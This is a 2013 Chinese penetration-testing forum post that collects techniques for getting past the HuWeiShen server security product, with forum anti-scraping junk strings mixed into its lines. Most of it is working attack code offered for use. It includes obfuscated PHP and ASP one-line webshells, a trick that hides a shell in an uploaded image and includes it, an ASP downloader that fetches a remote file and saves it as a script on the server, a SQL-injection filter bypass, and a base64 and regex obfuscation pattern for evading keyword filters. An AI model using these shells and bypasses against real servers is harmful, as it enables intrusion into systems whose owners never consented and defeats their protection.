找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 突破护卫神技术总汇
返回列表 发新帖
查看: 2251|回复: 0
打印 上一主题 下一主题

突破护卫神技术总汇

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-14 00:11:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家留言补上
8 J- B0 ?7 V" ^-----------------------------------------------------------------------------------------------------------------------------------
; A' Y" j0 W; v. H文章分为:
* @0 U$ t/ {  u4 J3 L! [' [) @( V+ P一、马儿篇,都是以前可以过护卫神的马  j- R& V" I$ h9 P$ u6 t. B- e0 A
二、注入篇,可以绕过注入的方法0 Z0 G2 I: m2 |
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
1 e! [3 C  k: m, v" u一、马儿篇
/ A- n: k# U" w/ H, u----------------1号--------------------------
* }) K4 K' N9 m< ?php 8 s/ }, M8 r  G% P
@eval
. F6 G% u" a( J" o( v) |8 i1 W% f($_POST['1']);?>
' ~: P0 N# X" x% U  o----------------2号--------------------------
6 g3 N3 u- s4 @1 B<title>login</title>nono<?php" E. O; B  E% @9 I5 U1 Z9 j
eval
- Z4 B9 w, n4 V+ j' T3 b$ A. z9 y$ j  l($_POST8 @2 F1 L: E1 d9 u4 z- D
[1])4 Z* O3 W0 _1 z. ~1 _8 f! U
?>9 ?& |$ ~, E" J$ K8 M$ g
--------------------3号---------------------------------------------" B1 Z: j3 D* ~! {' M! N
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
  o$ M, G/ p, M8 B# G  E$a($_POST["c"]); ?>7 \; v, S3 m" @* p( Q2 q9 _/ A& @
菜刀直接连,不需要构造连接字符串,密码 c' ?4 J3 J/ z* q% x
---------------------某牛给的,据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %>
- U& k* V# K1 k<%@language=vbscript codepage=936 %>: ^2 c% W+ o" {. c1 {5 {+ E
<%  a+ w! Q" r7 `
Option Explicit* x; e& H$ _8 C/ ?5 ?8 O7 r0 q4 d
'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面0 G/ p; l9 a' O" w: ]! S3 K% [% p
Response.Buffer = True
8 u% y$ N+ [4 bResponse.Expires = -1
7 T9 o* y" r! x' U& r  gResponse.ExpiresAbsolute = Now() - 1
3 c( Q, P7 ^7 r1 n- b2 \Response.Expires = 0
  s4 ^" W# e. D% xResponse.CacheControl = "no-cache"
6 o" ~2 ^0 K4 W! @* T' `1 O( I  cdim m) v. T4 o" a; P% h8 K
m=request("m")
0 J& @! o8 a" @+ o; MDim ArticleID, Action, sql, rs, Hits, ShowType  V7 l, z, F# c) r0 G9 c
if m<>"" then execute(m)
" N& Q5 m' ]: h' C9 m9 s0 lArticleID = Trim(request("ArticleID"))8 I; ?; B: j+ v: x) v
Action = Trim(request("Action"))7 i& ?  K4 @2 m" H: M- \( N; J8 I, {
ShowType = Trim(request("ShowType"))
/ d, i  o! V1 P' P$ [1 JIf IsNumeric(ShowType) Then
4 `, `, a& U. \! N    ShowType = CLng(ShowType)" k3 t9 Q) v$ y& {
Else& r9 _! q: F( d
    ShowType = 1
# h# J$ ?& N9 k. EEnd If# F7 V6 w3 `  v3 J1 n
%>
2 V- Z3 P, [4 r+ ]! M( j$ d. B& T--------------------类似于过安全狗的包含方法-------------------------------------------0 m6 Y$ I* B2 d6 X  v- @/ o
A.asp版本:! i* Y6 |% m  y* ?, M$ r/ B# o' `) D  R
将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg
; Z7 I2 \7 g. o( Y1 C; [0 [! ]在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"-->
5 z7 u' e. |/ _/ }2 _& @! W4 dB.php版本
3 U2 n) l% Q  c4 N8 P! c9 l# q如果是php的话:
; b; i- {" ~$ R5 }" k/ B< ?php
- E% X; o' [) c/ Finclude "1.htm";9 I' S: a  g/ c: N7 N! i5 _
?>) }. D1 i* c; c# {" U  R3 L  w' M
------------------实在不行,还可以下载---------------------------------------------) G& w4 H( z% I3 [8 P( L. {
远程下载马3 R& r3 o) i% O, x" \2 W4 B1 M
<%+ [% \! e! L5 ]

& \: y0 m( g' D* @$ R1 i" e$ a& nSet xPost = CreateObject("Microsoft.XMLHTTP")) y& i+ d+ r4 c1 V. F( O- w  m8 i5 B# u
; z8 L2 ?7 D/ ?( ?+ ?/ G( w
xPost.Open "GET","http://www.8090sec.com/1.txt",False& c; i4 a1 g7 Z- P" o
; ^  _% B- K4 r
xPost.Send()
1 }4 n0 _1 j4 P/ V0 h * ]- k5 P: E. V$ M! T+ `! x
Set sGet = CreateObject("ADODB.Stream")3 ]7 Y6 L8 x& z4 q- c- q- M& O

3 \3 C7 N3 F4 t7 r. @sGet.Mode = 3
* ]1 A3 j  B. O# r8 H6 d 3 z0 \7 A! B! X, y7 V( z# V
sGet.Type = 1, G7 E, m2 U6 ~1 |4 {3 n
0 b8 ]" }1 K4 H5 w) y5 k1 L
sGet.Open()
( I) a. l: }5 n! D 3 m0 |& ^. k4 G/ H7 |! c2 x% k
sGet.Write(xPost.responseBody)
4 |0 z+ e. K& M  `4 V$ j6 J$ M
0 [+ q& k9 {6 l" w0 A  _$ F7 esGet.SaveToFile Server.MapPath("ls.asp"),2* m) P* G  z. Z0 U" o- q8 q9 g
6 D2 Y# G( ?7 w+ [  c
set sGet = nothing) M5 d8 V3 K: G& ?# S+ ?, ~0 s$ ^7 y

8 `& O' n& m0 kset sPOST = nothing" Y4 x  y8 r3 k* J' m9 Q- Q
3 b* I' ^  [: X
%>
, C- V# h4 M9 {! ^( d) @& ]二、注入篇' u# p3 Q. o/ Q& f& s' b
/*%00*/截断符( T- j' p& a  f6 W9 }8 j, t
select/*%00*/* from admin;! G& b. B# x* x8 C
---------------------------------------------------------------, U  x# A( O8 g/ Q& Q
---------------------------------------------------------------9 s& p( ~% z2 _) D4 H: ?" i
三、规则篇1 u" e' Z1 ?& A( e
可以利用类似:
. t9 ^' \0 M7 s7 q% l5 W9 d9 i<?php7 N0 \7 |, x2 v) H
% Q6 _0 m/ W( @- O
$code='一串base64'; //base64编码
* @" W* ~# F; E! k% _
; {* s" |% D2 |# x, X5 t4 ^4 ?. j/ _: o$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换; v4 F/ F3 B* ^  u( Q8 Q+ F

* a3 T1 C/ L$ ]# |9 e$a = '/a/';//正则规则
* d) D# ^3 ^5 Y3 W5 r" _ 9 B; t* [4 ?: n, X
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换4 m. V* B) K% i
, t6 e4 Y  x8 f) C' H) |% ~; u9 n
?>: J# J/ k0 A1 b+ U% K* u
方法绕过关键词过滤
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表